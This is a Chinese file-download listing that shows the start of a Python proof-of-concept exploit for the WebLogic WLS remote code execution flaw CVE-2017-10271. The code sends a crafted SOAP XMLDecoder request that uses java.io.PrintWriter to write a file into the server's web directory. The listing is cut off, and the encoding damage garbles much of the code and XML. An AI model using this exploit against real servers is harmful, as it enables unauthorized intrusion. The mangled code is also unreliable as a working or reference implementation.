-
大小: 2KB文件類(lèi)型: .py金幣: 1下載: 0 次發(fā)布日期: 2021-05-25
- 語(yǔ)言: Python
- 標(biāo)簽: weblogic??網(wǎng)絡(luò)安全??
資源簡(jiǎn)介
一段小代碼,WebLogic WLS遠(yuǎn)程執(zhí)行漏洞(CVE-2017-10271)驗(yàn)證。
代碼片段和文件信息
#!/usr/bin/env?python
#?coding:utf-8
?
import?requests
from?sys?import?argv
?
headers?=?{
????‘User-Agent‘:‘Mozilla/5.0?(Windows?NT?10.0;?WOW64;?rv:48.0)?Gecko/20100101?Firefox/48.0‘
????‘Accept‘:?‘text/htmlapplication/xhtml+xmlapplication/xml;q=0.9*/*;q=0.8‘
????‘Upgrade-Insecure-Requests‘:?‘1‘
????‘Content-Type‘:?‘text/xml‘
????}
def?Webogic_xmlDecoder_poc(url):
????#url=“http://192.168.8.148:7001“
????posturl=url+‘/wls-wsat/CoordinatorPortType‘
????data?=?‘‘‘
????lns:soapenv=“http://schemas.xmlsoap.org/soap/envelope/“>
????????
????????????lns:work=“http://bea.com/2004/06/soap/workarea/“>
????????????????lDecoder“>
????????????????????ject?class=“java.io.PrintWriter“>
????????????????????????servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/tes 評(píng)論
共有 條評(píng)論
川公網(wǎng)安備 51152502000135號(hào)